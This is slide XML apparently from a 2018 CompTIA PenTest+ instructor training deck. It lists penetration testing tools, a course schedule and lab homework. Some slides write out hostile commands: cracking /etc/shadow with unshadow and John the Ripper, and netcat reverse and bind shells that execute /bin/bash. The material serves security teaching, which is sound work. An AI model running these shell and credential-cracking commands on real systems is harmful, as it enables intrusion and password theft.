            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Web application vulnerability and pen testing tool</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Burp Suite</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Professional and Community editions have different features, see:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>https://portswigger.net/burp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Social engineering tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SET (Social </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Engineering Toolkit) https://github.com/trustedsec/social-engineer-toolkit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>BeEF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (Browser Exploitation Framework) https://github.com/beefproject/beef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Remote </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>access tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SSH		(Secure Shell or Secure Socket Shell)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>NCAT		(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r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>replacement </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>from https://nmap.org/ncat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>NETCAT		(original </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> utility)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>NCAT and NETCAT can:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Connect to any port</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Set up bind and reverse shells</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Proxychains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	(Proxy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>any application - https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>github.com/haad/proxychains)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Note: Telnet not on Objectives here, but maybe should be with VNC, RDP, etc.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Networking tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Packet sniffer/analyzer	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>://www.wireshark.org/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Hping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Packer crafter/analyzer	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>://www.hping.org/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Mobile </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Drozer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>		Android </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Security Framework	https://github.com/mwrlabs/drozer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>APKX		Android APK </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>decompiler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https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>://github.com/b-mueller/apkx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>APK studio	Android </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>decompiler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>		http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>://vaibhavpandey.com/apkstudio/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MISC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Searchsploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	Exploit Database</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	https://www.exploit-db.com/searchsploit/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Powersploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	PS Post-exploit	https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>://github.com/PowerShellMafia/PowerSploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Responder	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>MS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>poisoner</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>://github.com/SpiderLabs/Responder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Impacket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	Packet tool			https://github.com/CoreSecurity/impacket</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Empire		Post-exploitation	https://github.com/EmpireProject/Empire</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/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  <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>			https://www.metasploit.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/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Note: PS above is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>PowerShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and MS above is Microsoft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Penetration </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Tools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>– Domain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>4.3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2881048"/>
            <a:ext cx="88884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8992" y="4007875"/>
            <a:ext cx="187457" cy="273844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4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Welcome to the Train-the-Trainer Series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7165" y="3056081"/>
            <a:ext cx="19542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Stephen Schneiter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 Network Program Manager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3"/>
              </a:rPr>
              <a:t>sschneiter@comptia.org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4039" y="3056081"/>
            <a:ext cx="195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Tazneen Kasem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Director. Product Management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Network+, CTT+, Project+  &amp; CIN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4"/>
              </a:rPr>
              <a:t>tkasem@comptia.org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461648" y="4767264"/>
            <a:ext cx="196453" cy="27384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/>
          <a:p>
            <a:pPr algn="r" defTabSz="342900">
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{91AF2B4D-6B12-4EDF-87BB-2B55CECB6611}" type="slidenum">
              <a:rPr lang="en-US" sz="675">
                <a:solidFill>
                  <a:srgbClr val="69727B"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:pPr algn="r" defTabSz="342900">
                <a:defRPr/>
              </a:pPr>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="675" dirty="0">
              <a:solidFill>
                <a:srgbClr val="69727B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65" y="1874318"/>
            <a:ext cx="1040804" cy="1040804"/>
          </a:xfrm>
          <a:prstGeom prst="round1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38" y="1874317"/>
            <a:ext cx="1065298" cy="1065298"/>
          </a:xfrm>
          <a:prstGeom prst="round1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94F18D-8460-4514-A409-B3CE655B12C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1607345" y="3056082"/>
            <a:ext cx="18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T. Lee McWhorter, Jr.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IT Expert Generalist and Educator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hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>lee@mcwhortertechnologies.com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17122E20-F3B1-4D8F-8447-BF0256C54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043" y="1874317"/>
            <a:ext cx="1049533" cy="104080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5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Tools – Domain 4.3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cracking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Pass </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>the hash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Setting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>up a bind shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Getting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>a reverse shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Proxying</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>a connection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Uploading </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>a web shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Injections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the Ripper and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> shells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608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the Ripper is a password hash cracker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>First we have to use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>unshadow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> utility to convert the file for cracking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>unshadow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>etc/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>etc/shadow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>root/Desktop/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mypasswd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Then we just need to run john against this version with</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>john /root/Desktop/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mypasswd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Then view results with</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>john -show /root/Desktop/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mypasswd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shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Set up listener on Kali Linux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lvp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 10000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Connect from remote system to Kali Linux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 192.168.13.13 10000 -e /bin/bash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bind shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Set up bind shell on target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lvp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 10000 -e /bin/bash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Connect from Kali Linux to target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> IP-Address-Target 10000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you program in…?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BASH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Python</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Ruby</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>PowerShell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Any other language</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Nope, not a line of code…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class!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NOTE: Two weeks off!  Next Clas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>s 7/17/18!  Happy 4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> for those in US! And have fun at the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>CompTIA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Conference!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some research and find out what all the options and parameters used in Lee’s solution to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> scenario actually do.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the various provided Virtual machines to set up some shells with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>and play with John the Ripper.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NOTE: Two weeks off!  Next Class 7/17/18!  Happy 4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> for those in US</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> And have fun at the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>CompTIA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Conference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Penetration </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Testing Tools </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>II </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>- Domains </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>4.4</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Analyze </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>a basic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Programming basics</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Python</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Ruby</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>PowerShell</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We will be mainly using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Dev-Client </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>VM for this session.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Next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871A-7EC4-422F-B574-F7F4DD06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time: Please type your questions in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32317-8DEF-4BD5-9BC7-CDD8A320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over content.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Share you experience.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What would you like to see </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>different moving forward?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934BE8-FA3C-435A-807A-87738D7D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1440A530-B47F-4A69-A514-B87BCACE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32" y="1536076"/>
            <a:ext cx="4762500" cy="222885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1C104D42-D1E7-4F57-8F57-E53F5E5A36D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2121199" y="3764926"/>
            <a:ext cx="4657725" cy="585618"/>
          </a:xfrm>
          <a:prstGeom prst="round2Diag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FC931-BD16-4F6F-911B-437FAFD2F9F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2243137" y="3803269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Let’s keep the going on LinkedIn in the CompTIA Instructor Forum: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://bit.ly/2wMU4nL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4816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565275" y="1063229"/>
            <a:ext cx="2477729" cy="3685189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vert="horz" lIns="0" tIns="34290" rIns="68580" bIns="34290" rtlCol="0">
            <a:no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 smtClean="0"/>
              <a:t>Using and analyzing output from:</a:t>
            </a:r>
          </a:p>
          <a:p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err="1" smtClean="0"/>
              <a:t>Netcat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penetration testing tools and utilities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AC7341-4D89-494D-B58E-07B291B5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8953"/>
            <a:ext cx="3593306" cy="2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10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717711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05/29/2018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Introduction: CompTIA program information, Tech review (Labs, GNS3 Project, &amp; VMs), and Planning and Scoping I.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05/31/2018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Planning and Scoping II: Penetration testing engagement scoping and compliance-based assessments.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06/05/2018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Information Gathering: Scanning, enumerating and the many other means of information gathering.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Vulnerability Identification: Vulnerability scanning and analysis to prepare for exploitation.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06/12/2018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I: Social engineering attack types and physical security.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II: Network-based, wireless &amp; RF-based, and application vulnerabilities.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7219" y="158916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3971" y="208204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79" y="259437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6659" y="307753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13683" y="348285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63" y="389791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47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887436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III: Local host vulnerabilities and post-exploitation techniques.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06/28/2018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I: Using and analyzing output from Nmap, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" baseline="0" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Netcat</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" baseline="0" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> and other penetration testing tools and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" baseline="0" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>utilities</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" baseline="0" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>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II: Programming and scripting overview (BASH, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>PowerShell</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" baseline="0" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>, Python &amp; Ruby).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I: Report writing and handling best practices, and the importance of communications.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II: Recommending mitigation strategies and other post-report activities.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Wrap up: Final review, demos, and best practices as well as CompTIA wrap up information and survey.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7219" y="1521067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3971" y="192639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Lee McWhorter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Instructor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Lead Author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Woz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
